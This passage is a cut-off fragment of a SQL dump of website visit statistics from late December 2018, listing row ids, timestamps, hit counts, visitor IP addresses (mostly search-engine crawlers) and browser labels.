other'),(357190,1545513352,2,2,0,0,'46.229.168.142','other'),(357191,1545513575,1,1,0,0,'46.229.168.134','other'),(357192,1545513791,3,3,0,0,'216.244.66.241','other'),(357193,1545513994,1,1,0,0,'157.55.39.186','other'),(357194,1545514198,1,1,0,0,'66.249.66.155','chrome'),(357195,1545514200,1,1,0,0,'66.249.66.152','chrome'),(357196,1545514653,1,1,0,0,'5.45.207.19','other'),(357197,1545514679,1,1,0,0,'66.249.66.156','chrome'),(357198,1545514813,1,1,0,0,'216.244.66.241','other'),(357199,1545514899,1,1,0,0,'66.249.66.42','chrome'),(357200,1545515012,1,1,0,0,'40.77.167.55','other'),(357201,1545515329,1,1,0,0,'95.108.213.4','other'),(357202,1545515399,7,7,0,0,'5.45.207.79','other'),(357203,1545515687,1,1,0,0,'95.163.255.63','other'),(357204,1545515690,1,1,0,0,'95.163.255.67','other'),(357205,1545515694,6,6,0,0,'178.154.244.11','other'),(357206,1545515780,2,2,0,0,'141.8.142.103','other'),(357207,1545515840,1,1,0,0,'5.45.207.19','other'),(357208,1545516137,2,2,0,0,'87.250.224.47','other'),(357209,1545516501,1,1,0,0,'157.55.39.186','other'),(357210,1545516912,1,1,0,0,'95.163.255.108','other'),(357211,1545517213,2,2,0,0,'216.244.66.241','other'),(357212,1545517223,1,1,0,0,'95.163.255.115','other'),(357213,1545517335,1,1,0,0,'207.46.13.25','other'),(357214,1545517608,2,2,0,0,'66.249.66.154','chrome'),(357215,1545517776,1,1,0,0,'66.249.66.156','chrome'),(357216,1545518063,1,1,0,0,'46.229.168.133','other'),(357217,1545518635,2,2,0,0,'46.229.168.138','other'),(357218,1545518732,1,1,0,0,'46.229.168.151','other'),(357219,1545518810,1,1,0,0,'5.45.207.19','other'),(357220,1545519086,1,1,0,0,'216.244.66.241','other'),(357221,1545519463,1,1,0,0,'157.55.39.186','other'),(357222,1545519619,2,2,0,0,'95.163.255.103','other'),(357223,1545519714,1,1,0,0,'66.249.66.156','chrome'),(357224,1545519736,3,3,0,0,'66.249.66.154','chrome'),(357225,1545519876,1,1,0,0,'95.163.255.115','other'),(357226,1545519885,2,2,0,0,'66.249.66.152','chrome'),(357227,1545520050,2,2,0,0,'95.163.255.112','other'),(357228,1545520075,3,3,0,0,'216.244.66.241','other'),(357229,1545520086,1,1,0,0,'46.229.168.147','other'),(357230,1545520170,3,3,0,0,'95.163.255.107','other'),(357231,1545520333,1,1,0,0,'95.163.255.108','other'),(357232,1545520364,2,2,0,0,'66.249.66.155','chrome'),(357233,1545520377,2,2,0,0,'95.163.255.109','other'),(357234,1545520486,1,1,0,0,'95.163.255.119','other'),(357235,1545520660,1,1,0,0,'66.249.66.156','chrome'),(357236,1545520720,1,1,0,0,'66.249.66.44','chrome'),(357237,1545520768,2,2,0,0,'66.249.66.154','chrome'),(357238,1545520840,1,1,0,0,'157.55.39.186','other'),(357239,1545520933,1,1,0,0,'66.249.66.152','chrome'),(357240,1545520953,1,1,0,0,'46.229.168.140','other'),(357241,1545520977,1,1,0,0,'8.29.198.25','other'),(357242,1545520980,1,1,0,0,'66.249.66.157','chrome'),(357243,1545521018,1,1,0,0,'216.244.66.241','other'),(357244,1545521679,2,2,0,0,'46.229.168.132','other'),(357245,1545521681,1,1,0,0,'46.229.168.136','other'),(357246,1545521765,1,1,0,0,'66.249.66.156','chrome'),(357247,1545521786,1,1,0,0,'66.249.66.154','chrome'),(357248,1545521919,1,1,0,0,'46.229.168.135','other'),(357249,1545521943,2,2,0,0,'66.249.66.152','chrome'),(357250,1545522004,1,1,0,0,'8.29.198.25','other'),(357251,1545522306,1,1,0,0,'66.249.66.155','chrome'),(357252,1545522612,1,1,0,0,'207.46.13.7','other'),(357253,1545522711,2,2,0,0,'66.249.66.156','chrome'),(357254,1545522898,1,1,0,0,'66.249.66.152','chrome'),(357255,1545522970,1,1,0,0,'66.249.66.61','chrome'),(357256,1545522999,1,1,0,0,'66.249.66.42','chrome'),(357257,1545523003,1,1,0,0,'216.244.66.241','other'),(357258,1545523456,1,1,0,0,'46.229.168.150','other'),(357259,1545523653,1,1,0,0,'178.154.244.11','other'),(357260,1545523832,1,1,0,0,'46.229.168.148','other'),(357261,1545524576,1,1,0,0,'66.249.66.155','chrome'),(357262,1545524615,1,1,0,0,'66.249.66.152','chrome'),(357263,1545524965,6,6,0,0,'178.154.244.11','other'),(357264,1545524969,2,2,0,0,'5.45.207.79','other'),(357265,1545525081,2,2,0,0,'141.8.142.103','other'),(357266,1545525238,1,1,0,0,'46.229.168.129','other'),(357267,1545525596,5,5,0,0,'5.45.207.19','other'),(357268,1545525838,1,1,0,0,'95.108.213.4','other'),(357269,1545526023,1,1,0,0,'5.45.207.79','other'),(357270,1545526080,2,2,0,0,'157.55.39.174','other'),(357271,1545526290,3,3,0,0,'216.244.66.241','other'),(357272,1545526369,1,1,0,0,'37.144.136.211','msie'),(357273,1545526378,1,1,0,0,'37.145.231.81','msie'),(357274,1545526519,1,1,0,0,'178.154.244.11','other'),(357275,1545526647,1,1,0,0,'109.201.133.100','other'),(357276,1545526690,1,1,0,0,'95.163.255.113','other'),(357277,1545526701,1,1,0,0,'95.163.255.116','other'),(357278,1545526718,1,1,0,0,'95.163.255.109','other'),(357279,1545526796,1,1,0,0,'66.249.66.57','chrome'),(357280,1545526799,1,1,0,0,'207.46.13.7','other'),(357281,1545526870,1,1,0,0,'66.249.66.42','chrome'),(357282,1545526899,2,2,0,0,'66.249.66.156','chrome'),(357283,1545527080,1,1,0,0,'95.163.255.114','other'),(357284,1545527087,1,1,0,0,'66.249.66.61','chrome'),(357285,1545527088,1,1,0,0,'66.249.66.40','chrome'),(357286,1545527569,2,2,0,0,'66.249.66.157','chrome'),(357287,1545527593,3,3,0,0,'66.249.66.154','chrome'),(357288,1545527700,1,1,0,0,'91.196.90.121','msie'),(357289,1545528044,2,2,0,0,'66.249.66.40','chrome'),(357290,1545528045,4,4,0,0,'66.249.66.156','chrome'),(357291,1545528137,2,2,0,0,'66.249.66.152','chrome'),(357292,1545528144,2,2,0,0,'66.249.66.155','chrome'),(357293,1545528204,1,1,0,0,'66.249.66.42','chrome'),(357294,1545528451,2,2,0,0,'66.249.66.61','chrome'),(357295,1545529099,1,1,0,0,'46.229.168.139','other'),(357296,1545529118,3,3,0,0,'66.249.66.59','chrome'),(357297,1545529173,3,3,0,0,'66.249.66.44','chrome'),(357298,1545529253,1,1,0,0,'178.154.244.11','other'),(357299,1545529388,5,5,0,0,'66.249.66.57','chrome'),(357300,1545529394,3,3,0,0,'66.249.66.42','chrome'),(357301,1545529483,1,1,0,0,'216.244.66.241','other'),(357302,1545529652,5,5,0,0,'66.249.66.40','chrome'),(357303,1545529674,1,1,0,0,'46.229.168.143','other'),(357304,1545529699,2,2,0,0,'66.249.66.61','chrome'),(357305,1545529895,1,1,0,0,'66.249.66.157','chrome'),(357306,1545529910,1,1,0,0,'66.249.66.154','chrome'),(357307,1545530001,1,1,0,0,'66.249.66.156','chrome'),(357308,1545530002,2,2,0,0,'66.249.66.152','chrome'),(357309,1545530167,1,1,0,0,'66.249.66.44','chrome'),(357310,1545530210,2,2,0,0,'66.249.66.59','chrome'),(357311,1545530466,1,1,0,0,'66.249.66.42','chrome'),(357312,1545531200,1,1,0,0,'66.249.66.154','chrome'),(357313,1545531297,1,1,0,0,'66.249.66.156','chrome'),(357314,1545531339,1,1,0,0,'66.249.79.188','chrome'),(357315,1545531446,1,1,0,0,'46.229.168.136','other'),(357316,1545531530,1,1,0,0,'66.249.66.57','chrome'),(357317,1545531563,1,1,0,0,'66.249.66.40','chrome'),(357318,1545531804,1,1,0,0,'8.29.198.27','other'),(357319,1545532008,1,1,0,0,'66.249.66.61','chrome'),(357320,1545532033,1,1,0,0,'66.249.66.44','chrome'),(357321,1545532625,1,1,0,0,'216.244.66.241','other'),(357322,1545532838,1,1,0,0,'8.29.198.27','other'),(357323,1545532981,1,1,0,0,'66.249.66.59','chrome'),(357324,1545533004,2,2,0,0,'66.249.66.40','chrome'),(357325,1545533013,1,1,0,0,'66.249.66.57','chrome'),(357326,1545533428,2,2,0,0,'34.222.23.122','chrome'),(357327,1545533538,3,3,0,0,'66.249.66.157','chrome'),(357328,1545533544,1,1,0,0,'180.76.15.163','other'),(357329,1545533545,1,1,0,0,'180.76.15.12','other'),(357330,1545533557,4,4,0,0,'66.249.66.152','chrome'),(357331,1545534053,1,1,0,0,'66.249.66.156','chrome'),(357332,1545534319,3,3,0,0,'66.249.66.57','chrome'),(357333,1545534339,2,2,0,0,'66.249.66.40','chrome'),(357334,1545534362,2,2,0,0,'66.249.66.44','chrome'),(357335,1545534696,1,1,0,0,'66.249.66.157','chrome'),(357336,1545534720,2,2,0,0,'66.249.66.154','chrome'),(357337,1545535235,1,1,0,0,'66.249.66.57','chrome'),(357338,1545535255,1,1,0,0,'66.249.66.42','chrome'),(357339,1545535297,1,1,0,0,'66.249.66.155','chrome'),(357340,1545535299,1,1,0,0,'66.249.66.156','chrome'),(357341,1545535324,1,1,0,0,'66.249.66.152','chrome'),(357342,1545535635,1,1,0,0,'216.244.66.241','other'),(357343,1545535756,1,1,0,0,'46.229.168.153','other'),(357344,1545535757,1,1,0,0,'46.229.168.141','other'),(357345,1545535915,1,1,0,0,'5.45.207.19','other'),(357346,1545536489,1,1,0,0,'66.249.66.61','chrome'),(357347,1545536490,1,1,0,0,'66.249.66.44','chrome'),(357348,1545536698,4,4,0,0,'141.8.142.103','other'),(357349,1545536956,1,1,0,0,'37.9.113.148','other'),(357350,1545537199,4,4,0,0,'5.45.207.19','other'),(357351,1545537237,4,4,0,0,'178.154.244.11','other'),(357352,1545537327,2,2,0,0,'5.45.207.79','other'),(357353,1545537752,1,1,0,0,'141.8.142.103','other'),(357354,1545537783,1,1,0,0,'37.9.113.103','other'),(357355,1545538052,1,1,0,0,'46.229.168.152','other'),(357356,1545538109,1,1,0,0,'95.108.213.4','other'),(357357,1545538112,1,1,0,0,'87.250.224.47','other'),(357358,1545538114,2,2,0,0,'5.45.207.19','other'),(357359,1545538761,1,1,0,0,'5.45.207.79','other'),(357360,1545538978,1,1,0,0,'46.229.168.142','other'),(357361,1545539127,1,1,0,0,'216.244.66.241','other'),(357362,1545539822,2,2,0,0,'46.229.168.154','other'),(357363,1545539983,1,1,0,0,'46.229.168.153','other'),(357364,1545540926,3,3,0,0,'216.244.66.241','other'),(357365,1545541022,1,1,0,0,'54.36.9.139','chrome'),(357366,1545541834,1,1,0,0,'46.229.168.154','other'),(357367,1545542566,2,2,0,0,'46.133.47.100','chrome'),(357368,1545542630,1,1,0,0,'8.29.198.26','other'),(357369,1545542886,1,1,0,0,'216.244.66.241','other'),(357370,1545542968,1,1,0,0,'66.249.66.156','chrome'),(357371,1545543343,1,1,0,0,'46.229.168.144','other'),(357372,1545543678,1,1,0,0,'8.29.198.25','other'),(357373,1545543942,1,1,0,0,'46.229.168.130','other'),(357374,1545543943,1,1,0,0,'46.229.168.139','other'),(357375,1545544383,1,1,0,0,'66.249.66.222','chrome'),(357376,1545545103,3,3,0,0,'216.244.66.241','other'),(357377,1545545669,1,1,0,0,'66.249.66.155','chrome'),(357379,1545546094,1,1,0,0,'66.249.66.157','chrome'),(357381,1545546637,2,2,0,0,'5.45.207.19','other'),(357382,1545546684,1,1,0,0,'87.250.224.47','other'),(357383,1545546716,4,4,0,0,'178.154.244.11','other'),(357384,1545546775,4,4,0,0,'5.45.207.79','other'),(357385,1545547053,1,1,0,0,'46.229.168.137','other'),(357386,1545547055,1,1,0,0,'46.229.168.129','other'),(357387,1545547648,1,1,0,0,'66.249.66.44','chrome'),(357388,1545547683,2,2,0,0,'216.244.66.241','other'),(357389,1545547859,1,1,0,0,'87.250.224.47','other'),(357390,1545547880,1,1,0,0,'66.249.93.202','chrome'),(357392,1545547886,3,3,0,0,'178.154.244.11','other'),(357393,1545548063,2,2,0,0,'5.45.207.19','other'),(357394,1545548301,3,3,0,0,'5.45.207.79','other'),(357395,1545548647,1,1,0,0,'216.244.66.241','other'),(357396,1545549004,1,1,0,0,'95.163.255.116','other'),(357397,1545549149,1,1,0,0,'95.163.255.108','other'),(357398,1545550073,1,0,1,0,'66.249.66.154',''),(357399,1545550369,1,1,0,0,'46.229.168.136','other'),(357400,1545550937,1,1,0,0,'46.229.168.154','other'),(357401,1545551133,2,2,0,0,'216.244.66.241','other'),(357402,1545551499,1,1,0,0,'66.249.66.154','chrome'),(357403,1545552017,1,1,0,0,'46.229.168.149','other'),(357404,1545552379,1,1,0,0,'216.244.66.241','other'),(357405,1545552380,1,1,0,0,'66.249.66.152','chrome'),(357406,1545553371,1,1,0,0,'66.249.66.195','chrome'),(357407,1545553380,1,1,0,0,'66.249.66.154','chrome'),(357408,1545553439,1,1,0,0,'66.249.66.152','chrome'),(357409,1545553460,1,1,0,0,'8.29.198.25','other'),(357410,1545553513,1,1,0,0,'207.46.13.195','other'),(357411,1545554423,2,2,0,0,'216.244.66.241','other'),(357412,1545554505,1,1,0,0,'8.29.198.27','other'),(357413,1545555382,1,1,0,0,'46.229.168.130','other'),(357414,1545555383,1,1,0,0,'46.229.168.149','other'),(357415,1545555418,1,1,0,0,'46.229.168.153','other'),(357416,1545555527,1,1,0,0,'216.244.66.241','other'),(357417,1545555710,1,1,0,0,'46.229.168.135','other'),(357418,1545556740,2,2,0,0,'46.229.168.141','other'),(357419,1545556804,1,1,0,0,'46.229.168.142','other'),(357420,1545557258,5,5,0,0,'216.244.66.241','other'),(357421,1545557940,1,1,0,0,'207.46.13.160','other'),(357422,1545558473,1,1,0,0,'95.108.213.4','other'),(357423,1545558508,28,28,0,0,'144.76.176.171','other'),(357424,1545558517,7,7,0,0,'178.154.244.11','other'),(357425,1545558526,1,1,0,0,'216.244.66.241','other'),(357426,1545558545,1,1,0,0,'66.249.66.155','chrome'),(357427,1545558556,1,1,0,0,'66.249.66.152','chrome'),(357428,1545558650,1,1,0,0,'141.8.142.103','other'),(357429,1545558656,1,1,0,0,'141.8.132.16','other'),(357430,1545558679,22,22,0,0,'207.244.157.10','other'),(357431,1545558765,43,43,0,0,'95.216.11.233','other'),(357432,1545558786,43,43,0,0,'95.216.20.84','other'),(357433,1545558789,43,43,0,0,'95.216.11.34','other'),(357434,1545558827,6,6,0,0,'5.45.207.79','other'),(357435,1545559160,1,1,0,0,'141.8.183.23','other'),(357436,1545559224,1,1,0,0,'178.154.200.48','other'),(357437,1545559257,1,1,0,0,'213.180.203.17','other'),(357438,1545559491,1,1,0,0,'66.249.66.156','chrome'),(357440,1545559521,1,1,0,0,'66.249.66.152','chrome'),(357441,1545559526,1,1,0,0,'5.45.207.19','other'),(357442,1545559615,2,2,0,0,'141.8.142.103','other'),(357443,1545559716,4,4,0,0,'216.244.66.241','other'),(357444,1545559951,1,1,0,0,'95.108.213.4','other'),(357445,1545559994,1,1,0,0,'66.249.66.44','chrome'),(357446,1545560001,1,1,0,0,'66.249.66.155','chrome'),(357447,1545560095,1,1,0,0,'66.249.66.154','chrome'),(357448,1545560096,4,4,0,0,'5.45.207.79','other'),(357449,1545560212,1,1,0,0,'66.249.66.40','chrome'),(357450,1545560549,2,2,0,0,'141.8.142.103','other'),(357451,1545560593,1,1,0,0,'46.229.168.140','other'),(357452,1545560622,1,1,0,0,'216.244.66.241','other'),(357453,1545560675,1,1,0,0,'66.249.66.156','chrome'),(357454,1545561217,1,1,0,0,'95.108.213.4','other'),(357455,1545561524,2,2,0,0,'216.244.66.241','other'),(357456,1545562467,1,1,0,0,'95.108.213.4','other'),(357457,1545562497,1,1,0,0,'46.229.168.151','other'),(357458,1545562692,2,2,0,0,'207.46.13.160','other'),(357459,1545562710,1,1,0,0,'37.73.61.191','chrome'),(357460,1545562831,2,2,0,0,'46.211.130.218','chrome'),(357461,1545563185,1,1,0,0,'5.45.207.19','other'),(357462,1545563513,1,1,0,0,'46.229.168.150','other'),(357463,1545564308,1,1,0,0,'8.29.198.26','other'),(357464,1545564769,1,1,0,0,'216.244.66.241','other'),(357465,1545565334,1,1,0,0,'8.29.198.25','other'),(357466,1545565581,1,1,0,0,'46.166.186.224','other'),(357467,1545565836,5,5,0,0,'216.244.66.241','other'),(357468,1545566514,2,2,0,0,'66.249.66.156','chrome'),(357469,1545566543,1,1,0,0,'66.249.66.195','chrome'),(357470,1545566626,1,1,0,0,'141.8.142.103','other'),(357471,1545566778,4,4,0,0,'216.244.66.241','other'),(357472,1545566854,2,2,0,0,'66.249.66.152','chrome'),(357473,1545566986,1,1,0,0,'66.249.66.155','chrome'),(357474,1545566987,1,1,0,0,'66.249.66.154','chrome'),(357475,1545567436,1,1,0,0,'91.196.178.103','chrome'),(357476,1545567442,1,1,0,0,'46.229.168.135','other'),(357477,1545567740,1,1,0,0,'216.244.66.241','other'),(357478,1545568336,1,1,0,0,'66.249.66.42','chrome'),(357479,1545568344,1,1,0,0,'66.249.66.152','chrome'),(357480,1545568400,1,1,0,0,'46.229.168.153','other'),(357481,1545568501,1,1,0,0,'66.249.66.44','chrome'),(357482,1545568834,1,1,0,0,'46.229.168.139','other'),(357483,1545569799,3,3,0,0,'216.244.66.241','other'),(357484,1545570155,1,1,0,0,'157.55.39.109','other'),(357485,1545570523,1,1,0,0,'46.229.168.139','other'),(357486,1545570567,1,1,0,0,'46.229.168.137','other'),(357487,1545570708,1,1,0,0,'216.244.66.241','other'),(357488,1545570787,2,2,0,0,'5.45.207.19','other'),(357489,1545570797,12,12,0,0,'178.154.244.11','other'),(357490,1545571029,1,1,0,0,'46.229.168.136','other'),(357491,1545571051,3,3,0,0,'5.45.207.79','other'),(357492,1545571054,2,2,0,0,'141.8.142.103','other'),(357493,1545571128,1,1,0,0,'37.9.113.148','other'),(357494,1545571306,1,1,0,0,'13.66.139.0','other'),(357495,1545571659,1,1,0,0,'141.8.142.108','other'),(357496,1545571666,1,1,0,0,'95.108.213.4','other'),(357497,1545571722,1,1,0,0,'5.45.207.19','other'),(357498,1545571789,2,2,0,0,'178.154.244.11','other'),(357499,1545571976,2,2,0,0,'5.45.207.79','other'),(357500,1545572611,1,1,0,0,'46.229.168.143','other'),(357501,1545572613,1,1,0,0,'46.229.168.154','other'),(357502,1545572963,1,1,0,0,'178.154.244.11','other'),(357503,1545573236,1,1,0,0,'207.46.13.197','other'),(357504,1545573779,2,2,0,0,'47.244.144.5','firefox'),(357505,1545574412,2,2,0,0,'52.53.201.78','chrome'),(357506,1545574673,1,1,0,0,'46.229.168.136','other'),(357507,1545574805,2,2,0,0,'37.52.17.124','chrome'),(357508,1545574962,3,3,0,0,'91.196.178.99','chrome'),(357509,1545575047,1,1,0,0,'13.66.139.0','other'),(357510,1545575053,1,1,0,0,'66.249.66.152','chrome'),(357511,1545575140,1,1,0,0,'8.29.198.25','other'),(357512,1545575363,3,3,0,0,'216.244.66.241','other'),(357513,1545575409,3,3,0,0,'66.249.66.61','chrome'),(357514,1545575410,2,2,0,0,'66.249.66.42','chrome'),(357515,1545575901,1,1,0,0,'66.249.66.44','chrome'),(357516,1545576100,1,1,0,0,'46.229.168.129','other'),(357517,1545576164,1,1,0,0,'8.29.198.27','other'),(357518,1545576336,1,1,0,0,'66.249.66.61','chrome'),(357519,1545576364,1,1,0,0,'66.249.66.40','chrome'),(357520,1545577550,1,1,0,0,'66.249.66.152','chrome'),(357521,1545578048,1,1,0,0,'46.229.168.149','other'),(357522,1545578295,1,1,0,0,'46.229.168.138','other'),(357523,1545578496,3,3,0,0,'216.244.66.241','other'),(357524,1545578962,1,1,0,0,'46.229.168.141','other'),(357525,1545579069,1,1,0,0,'46.229.168.136','other'),(357526,1545579133,1,1,0,0,'180.76.15.29','other'),(357527,1545579134,1,1,0,0,'180.76.15.20','other'),(357528,1545579182,1,1,0,0,'40.77.169.22','other'),(357529,1545579243,1,1,0,0,'46.229.168.137','other'),(357530,1545579429,1,1,0,0,'46.229.168.147','other'),(357531,1545579737,1,1,0,0,'46.229.168.138','other'),(357532,1545580112,1,1,0,0,'46.229.168.149','other'),(357533,1545580114,1,1,0,0,'46.229.168.133','other'),(357534,1545580217,1,1,0,0,'178.92.146.245','chrome'),(357535,1545580571,1,1,0,0,'46.211.151.122','chrome'),(357536,1545581057,2,2,0,0,'46.211.27.78','chrome'),(357537,1545581281,5,5,0,0,'216.244.66.241','other'),(357538,1545581337,5,5,0,0,'178.154.244.11','other'),(357539,1545581339,1,1,0,0,'5.188.210.3','other'),(357540,1545581360,5,5,0,0,'5.45.207.79','other'),(357541,1545581446,6,6,0,0,'141.8.142.103','other'),(357542,1545581633,8,8,0,0,'5.45.207.19','other'),(357543,1545581757,1,1,0,0,'46.229.168.134','other'),(357544,1545581759,1,1,0,0,'46.229.168.153','other'),(357545,1545581883,1,1,0,0,'66.249.66.152','chrome'),(357546,1545582198,1,1,0,0,'37.9.113.148','other'),(357547,1545582218,1,1,0,0,'95.108.213.4','other'),(357548,1545582251,1,1,0,0,'178.154.244.11','other'),(357549,1545582447,3,3,0,0,'5.45.207.79','other'),(357550,1545582560,1,1,0,0,'141.8.142.103','other'),(357551,1545583011,1,1,0,0,'46.229.168.135','other'),(357552,1545583021,2,2,0,0,'5.45.207.19','other'),(357553,1545583228,1,1,0,0,'66.249.66.156','chrome'),(357554,1545583522,2,2,0,0,'66.249.66.154','chrome'),(357555,1545583532,1,1,0,0,'66.249.66.42','chrome'),(357556,1545583650,2,2,0,0,'5.45.207.79','other'),(357557,1545583820,1,1,0,0,'87.250.224.47','other'),(357558,1545584157,1,1,0,0,'180.76.15.151','other'),(357559,1545584158,1,1,0,0,'180.76.15.136','other'),(357560,1545584181,1,1,0,0,'66.249.66.152','chrome'),(357561,1545584199,1,1,0,0,'95.108.213.4','other'),(357562,1545584467,3,3,0,0,'216.244.66.241','other'),(357563,1545584496,1,1,0,0,'46.229.168.149','other'),(357564,1545584523,1,1,0,0,'66.249.66.154','chrome'),(357565,1545584546,1,1,0,0,'46.229.168.134','other'),(357566,1545584598,1,1,0,0,'46.229.168.148','other'),(357567,1545584600,1,1,0,0,'46.229.168.152','other'),(357568,1545584892,1,1,0,0,'141.8.142.103','other'),(357569,1545584918,1,1,0,0,'46.229.168.138','other'),(357570,1545585391,1,1,0,0,'216.244.66.241','other'),(357571,1545585512,2,2,0,0,'66.249.66.156','chrome'),(357572,1545585970,1,1,0,0,'8.29.198.26','other'),(357573,1545586714,2,2,0,0,'46.211.119.114','chrome'),(357574,1545586778,1,1,0,0,'66.249.66.157','chrome'),(357575,1545586779,1,1,0,0,'66.249.66.152','chrome'),(357576,1545586989,1,1,0,0,'8.29.198.25','other'),(357577,1545587312,5,5,0,0,'216.244.66.241','other'),(357578,1545587318,2,2,0,0,'91.196.178.135','firefox'),(357579,1545587758,1,1,0,0,'95.108.213.4','other'),(357580,1545588079,1,1,0,0,'46.229.168.153','other'),(357581,1545588241,1,1,0,0,'46.229.168.154','other'),(357582,1545588929,1,1,0,0,'91.196.178.173','chrome'),(357583,1545589659,1,1,0,0,'66.249.66.42','chrome'),(357584,1545590214,6,6,0,0,'216.244.66.241','other'),(357585,1545590695,2,2,0,0,'95.134.203.147','chrome'),(357586,1545590783,1,1,0,0,'66.249.66.154','chrome'),(357587,1545591273,3,3,0,0,'66.249.66.156','chrome'),(357588,1545591323,1,1,0,0,'66.249.66.42','chrome'),(357589,1545591569,1,1,0,0,'95.108.213.4','other'),(357590,1545591572,2,2,0,0,'5.45.207.19','other'),(357591,1545591815,2,2,0,0,'66.249.66.152','chrome'),(357592,1545592018,1,1,0,0,'66.249.66.40','chrome'),(357593,1545592178,4,4,0,0,'5.45.207.79','other'),(357594,1545592201,3,3,0,0,'178.154.244.11','other'),(357595,1545592393,1,1,0,0,'87.250.224.47','other'),(357596,1545592476,2,2,0,0,'37.9.113.148','other'),(357597,1545592500,1,1,0,0,'66.249.66.44','chrome'),(357598,1545592528,1,1,0,0,'37.9.113.20','other'),(357599,1545592656,1,1,0,0,'37.9.113.103','other'),(357600,1545592724,3,3,0,0,'66.249.66.152','chrome'),(357601,1545592855,6,6,0,0,'141.8.142.103','other'),(357602,1545593098,1,1,0,0,'66.249.66.156','chrome'),(357603,1545593258,7,7,0,0,'216.244.66.241','other'),(357604,1545593298,5,5,0,0,'178.154.244.11','other'),(357605,1545593307,2,2,0,0,'87.250.224.47','other'),(357606,1545593318,3,3,0,0,'95.108.213.4','other'),(357607,1545593328,2,2,0,0,'5.45.207.79','other'),(357608,1545594097,2,2,0,0,'91.196.178.75','chrome'),(357609,1545594249,3,3,0,0,'82.145.209.2','other'),(357610,1545594340,1,1,0,0,'82.145.209.171','other'),(357611,1545594371,1,1,0,0,'66.249.66.152','chrome'),(357612,1545594931,1,1,0,0,'46.229.168.151','other'),(357613,1545595088,1,1,0,0,'5.45.207.19','other'),(357614,1545595926,1,1,0,0,'37.53.225.40','chrome'),(357615,1545596223,4,4,0,0,'216.244.66.241','other'),(357616,1545596310,1,1,0,0,'213.180.203.53','other'),(357617,1545596803,1,1,0,0,'8.29.198.26','other'),(357618,1545597232,1,1,0,0,'46.229.168.142','other'),(357619,1545597260,1,1,0,0,'46.229.168.130','other'),(357620,1545597437,1,1,0,0,'141.8.142.103','other'),(357621,1545597704,1,1,0,0,'40.77.167.53','other'),(357622,1545597810,1,1,0,0,'8.29.198.26','other'),(357623,1545597930,1,1,0,0,'40.77.167.158','other'),(357624,1545597962,1,1,0,0,'66.249.66.156','chrome'),(357625,1545598079,3,3,0,0,'157.55.39.59','other'),(357626,1545599361,3,3,0,0,'216.244.66.241','other'),(357627,1545599571,1,1,0,0,'95.163.255.68','other'),(357628,1545599574,1,1,0,0,'95.163.255.65','other'),(357629,1545599792,1,1,0,0,'46.229.168.136','other'),(357630,1545600028,1,1,0,0,'66.249.66.157','chrome'),(357631,1545600079,1,1,0,0,'66.249.66.154','chrome'),(357632,1545600401,1,1,0,0,'40.77.167.12','other'),(357633,1545600709,1,1,0,0,'46.229.168.135','other'),(357634,1545600822,1,1,0,0,'66.249.66.152','chrome'),(357635,1545602077,3,3,0,0,'216.244.66.241','other'),(357636,1545602145,1,1,0,0,'46.229.168.150','other'),(357637,1545602147,1,1,0,0,'46.229.168.141','other'),(357638,1545602472,1,1,0,0,'66.249.66.155','chrome'),(357639,1545602476,1,1,0,0,'66.249.66.152','chrome'),(357640,1545602752,1,1,0,0,'46.229.168.146','other'),(357641,1545602997,2,2,0,0,'216.244.66.241','other'),(357642,1545603804,2,2,0,0,'207.46.13.50','other'),(357643,1545603865,2,2,0,0,'213.180.203.9','other'),(357644,1545603987,1,1,0,0,'141.8.183.23','other'),(357645,1545604019,1,1,0,0,'95.108.181.75','other'),(357646,1545604042,1,1,0,0,'141.8.183.22','other'),(357647,1545604045,6,6,0,0,'5.45.207.19','other'),(357648,1545604048,10,10,0,0,'178.154.244.11','other'),(357649,1545604096,2,2,0,0,'141.8.142.103','other'),(357650,1545604150,2,2,0,0,'213.180.203.53','other'),(357651,1545604216,1,1,0,0,'178.154.244.65','other'),(357652,1545604297,3,3,0,0,'178.154.171.27','other'),(357653,1545604307,1,1,0,0,'213.180.203.17','other'),(357654,1545604310,2,2,0,0,'95.108.213.50','other'),(357655,1545604368,1,1,0,0,'37.9.113.148','other'),(357656,1545604373,2,2,0,0,'37.9.113.20','other'),(357657,1545604425,1,1,0,0,'178.154.200.48','other'),(357658,1545604494,1,1,0,0,'87.250.224.47','other'),(357659,1545604574,1,1,0,0,'141.8.132.16','other'),(357660,1545604589,1,1,0,0,'46.229.168.129','other'),(357661,1545604615,1,1,0,0,'37.9.113.103','other'),(357662,1545604621,1,1,0,0,'213.180.203.40','other'),(357663,1545604653,1,1,0,0,'95.108.213.4','other'),(357664,1545604702,2,2,0,0,'5.45.207.79','other'),(357665,1545605073,1,1,0,0,'46.229.168.138','other'),(357666,1545605272,2,2,0,0,'5.45.207.19','other'),(357667,1545605350,3,3,0,0,'216.244.66.241','other'),(357668,1545605789,1,1,0,0,'87.250.224.47','other'),(357669,1545605884,1,1,0,0,'40.77.167.139','other'),(357670,1545605962,2,2,0,0,'66.249.66.44','chrome'),(357671,1545606054,1,1,0,0,'37.9.113.103','other'),(357672,1545606055,1,1,0,0,'5.45.207.79','other'),(357673,1545606238,1,1,0,0,'66.249.66.156','chrome'),(357674,1545606320,1,1,0,0,'66.249.66.40','chrome'),(357675,1545606472,1,1,0,0,'66.249.66.42','chrome'),(357676,1545607192,2,2,0,0,'5.45.207.19','other'),(357677,1545607193,1,1,0,0,'141.8.142.108','other'),(357678,1545607195,1,1,0,0,'178.154.244.49','other'),(357679,1545607348,1,1,0,0,'66.249.66.156','chrome'),(357680,1545607637,1,1,0,0,'8.29.198.27','other'),(357681,1545607681,2,2,0,0,'66.249.66.152','chrome'),(357682,1545608201,4,4,0,0,'216.244.66.241','other'),(357683,1545608637,1,1,0,0,'8.29.198.27','other'),(357684,1545608876,2,2,0,0,'66.249.66.156','chrome'),(357685,1545608962,1,1,0,0,'66.249.66.154','chrome'),(357686,1545609159,1,1,0,0,'216.244.66.241','other'),(357687,1545609307,1,1,0,0,'5.45.207.79','other'),(357688,1545610022,1,1,0,0,'46.229.168.140','other'),(357689,1545610095,1,1,0,0,'5.188.210.53','chrome'),(357690,1545610874,1,1,0,0,'46.229.168.143','other'),(357691,1545610925,2,2,0,0,'95.163.255.104','other'),(357692,1545610931,2,2,0,0,'95.163.255.107','other'),(357693,1545610938,1,1,0,0,'95.163.255.109','other'),(357694,1545610943,1,1,0,0,'95.163.255.119','other'),(357695,1545610977,1,1,0,0,'95.163.255.112','other'),(357696,1545610988,2,2,0,0,'95.163.255.113','other'),(357697,1545610995,1,1,0,0,'95.163.255.108','other'),(357698,1545611004,2,2,0,0,'95.163.255.114','other'),(357699,1545611061,1,1,0,0,'95.163.